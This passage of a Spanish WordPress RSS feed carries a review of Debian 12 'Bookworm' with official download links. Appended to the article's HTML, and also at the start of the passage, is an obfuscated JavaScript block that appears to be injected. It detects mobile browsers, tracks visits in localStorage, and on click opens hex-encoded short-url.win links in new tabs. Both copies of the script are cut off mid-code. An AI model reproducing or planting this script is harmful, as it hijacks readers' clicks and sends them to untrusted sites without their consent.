)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/oculto-a-plena-vista-kaspersky-descubre-un-presunto-ataque-a-la-cadena-de-suministro-dirigido-a-linux/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98089</post-id>	</item>
		<item>
		<title>Debian 12 «Bookworm»: El clásico de Linux se renueva con innovación y estabilidad</title>
		<link>https://www.todoenunclick.com/debian-12-bookworm-el-clasico-de-linux-se-renueva-con-innovacion-y-estabilidad/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Sun, 11 Jun 2023 17:21:15 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Bookworm]]></category>
		<category><![CDATA[Debian 12]]></category>
		<category><![CDATA[estabilidad]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[software libre]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=4464</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2023/06/Debian-12-oficial.jpg.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/06/Debian-12-oficial.jpg.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/06/Debian-12-oficial.jpg.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/06/Debian-12-oficial.jpg.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/06/Debian-12-oficial.jpg.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/06/Debian-12-oficial.jpg.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/06/Debian-12-oficial.jpg.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/06/Debian-12-oficial.jpg.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>¡Amantes de Linux, prepárense para dar la bienvenida a la última versión del venerable Debian! Después de casi dos años desde la última actualización, llega<strong> Debian 12 "Bookworm"</strong> con una serie de novedades emocionantes. El clásico entre las distribuciones de Linux se destaca por su enfoque en la estabilidad, la previsibilidad y la fiabilidad, a diferencia de otras distribuciones más orientadas a lo último de lo nuevo. Pero eso no significa que Debian se haya quedado atrás en términos de innovación. ¡Veamos qué nos trae esta nueva versión!</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El cambio más notable en Debian 12 es un verdadero hito para la comunidad: por primera vez, se incluye software no libre en el medio de instalación predeterminado. Esta decisión se basa en la realidad de que muchos sistemas actuales dependen de firmware propietario y controladores de gráficos específicos para un rendimiento óptimo. Ahora, la instalación de Debian en hardware moderno se simplifica enormemente. Sin embargo, aquellos que tengan reservas sobre el software no libre pueden optar fácilmente por excluir estos componentes durante la instalación.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Además de este cambio filosófico, Debian 12 trae consigo una serie de mejoras estructurales. Por ejemplo, el gestor de arranque Grub ya no crea automáticamente entradas para otros sistemas operativos, lo cual puede ser desafortunado para algunos, pero también ha resuelto problemas de compatibilidad. La herramienta de registro Rsyslog ya no se utiliza de forma predeterminada, dando paso a las posibilidades de journalctl, que forma parte de systemd. Estos y otros cambios se detallan en las notas de la versión para aquellos interesados en conocer más detalles.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Por supuesto, la esencia de cada nueva versión de Debian radica en las actualizaciones de los componentes de software incluidos. Y en este aspecto, Debian 12 no decepciona. El kernel de soporte a largo plazo ahora se encuentra en su versión 6.1, superando al 5.10 presente en Debian 11. Sorprendentemente, esto significa que Debian 12 cuenta con un kernel más actualizado que algunos teléfonos inteligentes Android. En cuanto al escritorio predeterminado, GNOME 43 se roba el protagonismo en esta versión. Con Debian 12, los usuarios disfrutarán de una versión casi actual de GNOME, con numerosas funciones nuevas, mejoras de rendimiento y cambios en programas clave. El servidor de audio Pipewire también hace su aparición en esta versión.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Si bien<strong> GNOME</strong> es el escritorio predeterminado, Debian 12 ofrece una amplia variedad de opciones para aquellos que prefieren otros entornos de escritorio. <strong>KDE Plasma 5.27, Mate 1.26 y Xfce 4.18</strong> son solo algunas de las muchas alternativas disponibles. En cuanto al software incluido, se destaca la presencia de <strong>LibreOffice 7.4</strong>, una versión más actualizada que la anteriormente incluida en Debian 11, así como el cliente de bits torrent Transmission 3.0.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Más allá del escritorio, Debian 12 trae importantes innovaciones en otros aspectos. La actualización a GCC 12 y Glibc 2.36, junto con las versiones actualizadas de Nginx, Python y Samba, son solo algunas de las mejoras que encontrarán los usuarios de Debian. Además, se han agregado más de 11,000 nuevos paquetes a las fuentes de distribución desde Debian 11, lo que eleva el número total de paquetes individuales disponibles a 64,419. Aunque el crecimiento no es tan grande como podría parecer, alrededor del 10% de los paquetes ofrecidos anteriormente han sido marcados como obsoletos y se han eliminado.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para aquellos interesados en probar Debian 12, el proceso de instalación se realiza a través de un archivo de descarga de 700 MB disponible en el sitio web oficial. Si bien el instalador gráfico puede no ser tan intuitivo como el de otras distribuciones como Ubuntu o Fedora, sigue siendo accesible con un poco de conocimiento básico. Es importante destacar que la imagen de instalación no contiene todos los paquetes disponibles en el universo Debian, pero los paquetes faltantes se pueden cargar según sea necesario.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los usuarios de Debian existentes pueden actualizar directamente a Debian 12 desde su sistema actual, aunque se recomienda hacer una copia de seguridad antes del proceso. Aquellos cuyos sistemas se crearon antes de Debian 10 deben estar preparados para una reorganización significativa, ya que Debian ahora solo admite la jerarquía del sistema de archivos donde los directorios como /bin, /sbin y /lib están bajo /usr.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Debian 12 está disponible en una amplia gama de variantes y admite nueve arquitecturas de procesador diferentes, lo que garantiza que haya una opción adecuada para todos los usuarios. La versión actual de Debian tendrá soporte durante al menos cinco años, lo que significa que las actualizaciones se mantendrán hasta junio de 2028 como muy pronto. Además, el soporte general para Debian 11 continuará hasta julio de 2024, con soporte a largo plazo de al menos dos años más.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Con Debian 12 "Bookworm", la comunidad de Linux celebra otro hito en la historia de esta distribución icónica. La inclusión de software no libre en el medio de instalación predeterminado refleja la adaptabilidad y el enfoque pragmático de Debian para adaptarse a las necesidades cambiantes de los usuarios. A medida que los usuarios exploren las numerosas mejoras y actualizaciones, no cabe duda de que Debian seguirá siendo un referente en el mundo de Linux y una opción confiable para aquellos que buscan estabilidad y rendimiento. ¡Actualiza, explora y disfruta de Debian 12 "Bookworm"!</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":5} -->
<h5 class="wp-block-heading"><strong>Descargar Debian 12</strong></h5>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>No se le llama a Debian «el sistema operativo universal» por nada. Debian 12 soporta una gran cantidad de arquitecturas diferentes, pero aquí te dejamos como siempre con los instaladores para PC.</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li><strong>DVD</strong>&nbsp;– Descarga directa:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current/i386/iso-dvd/" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current/amd64/iso-dvd/" target="_blank" rel="noreferrer noopener">64-bit</a>&nbsp;| Torrent:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current/i386/bt-dvd/" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current/amd64/bt-dvd/" target="_blank" rel="noreferrer noopener">64-bit</a>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Cinnamon Live</strong>&nbsp;– Descarga directa:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-12.0.0-i386-cinnamon.iso" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a rel="noreferrer noopener" href="https://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-12.0.0-amd64-cinnamon.iso" target="_blank">64-bit</a>&nbsp;| Torrent:&nbsp;<a rel="noreferrer noopener" href="https://cdimage.debian.org/debian-cd/current-live/i386/bt-hybrid/debian-live-12.0.0-i386-cinnamon.iso.torrent" target="_blank">32-bit</a>,&nbsp;<a rel="noreferrer noopener" href="https://cdimage.debian.org/debian-cd/current-live/amd64/bt-hybrid/debian-live-12.0.0-amd64-cinnamon.iso.torrent" target="_blank">64-bit</a>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>GNOME Live</strong>&nbsp;– Descarga directa:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-12.0.0-i386-gnome.iso" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-12.0.0-amd64-gnome.iso" target="_blank" rel="noreferrer noopener">64-bit</a>&nbsp;| Torrent:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/bt-hybrid/debian-live-12.0.0-i386-gnome.iso.torrent" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/bt-hybrid/debian-live-12.0.0-amd64-gnome.iso.torrent" target="_blank" rel="noreferrer noopener">64-bit</a>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>KDE Live</strong>&nbsp;– Descarga directa:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-12.0.0-i386-kde.iso" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-12.0.0-amd64-kde.iso" target="_blank" rel="noreferrer noopener">64-bit</a>&nbsp;| Torrent:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/bt-hybrid/debian-live-12.0.0-i386-kde.iso.torrent" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/bt-hybrid/debian-live-12.0.0-amd64-kde.iso.torrent" target="_blank" rel="noreferrer noopener">64-bit</a>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>LXDE Live</strong>&nbsp;– Descarga directa:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-12.0.0-i386-lxde.iso" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-12.0.0-amd64-lxde.iso" target="_blank" rel="noreferrer noopener">64-bit</a>&nbsp;| Torrent:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/bt-hybrid/debian-live-12.0.0-i386-lxde.iso.torrent" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/bt-hybrid/debian-live-12.0.0-amd64-lxde.iso.torrent" target="_blank" rel="noreferrer noopener">64-bit</a>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>LXQt Live</strong>&nbsp;– Descarga directa:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-12.0.0-i386-lxqt.iso" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-12.0.0-amd64-lxqt.iso" target="_blank" rel="noreferrer noopener">64-bit</a>&nbsp;| Torrent:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/bt-hybrid/debian-live-12.0.0-i386-lxqt.iso.torrent" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/bt-hybrid/debian-live-12.0.0-amd64-lxqt.iso.torrent" target="_blank" rel="noreferrer noopener">64-bit</a>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>MATE Live</strong>&nbsp;– Descarga directa:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-12.0.0-i386-mate.iso" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-12.0.0-amd64-mate.iso" target="_blank" rel="noreferrer noopener">64-bit</a>&nbsp;| Torrent:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/bt-hybrid/debian-live-12.0.0-i386-mate.iso.torrent" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/bt-hybrid/debian-live-12.0.0-amd64-mate.iso.torrent" target="_blank" rel="noreferrer noopener">64-bit</a>.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Xfce Live</strong>&nbsp;– Descarga directa:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-12.0.0-i386-xfce.iso" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-12.0.0-amd64-xfce.iso" target="_blank" rel="noreferrer noopener">64-bit</a>&nbsp;| Torrent:&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/i386/bt-hybrid/debian-live-12.0.0-i386-xfce.iso.torrent" target="_blank" rel="noreferrer noopener">32-bit</a>,&nbsp;<a href="https://cdimage.debian.org/debian-cd/current-live/amd64/bt-hybrid/debian-live-12.0.0-amd64-xfce.iso.torrent" target="_blank" rel="noreferrer noopener">64-bit</a>.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 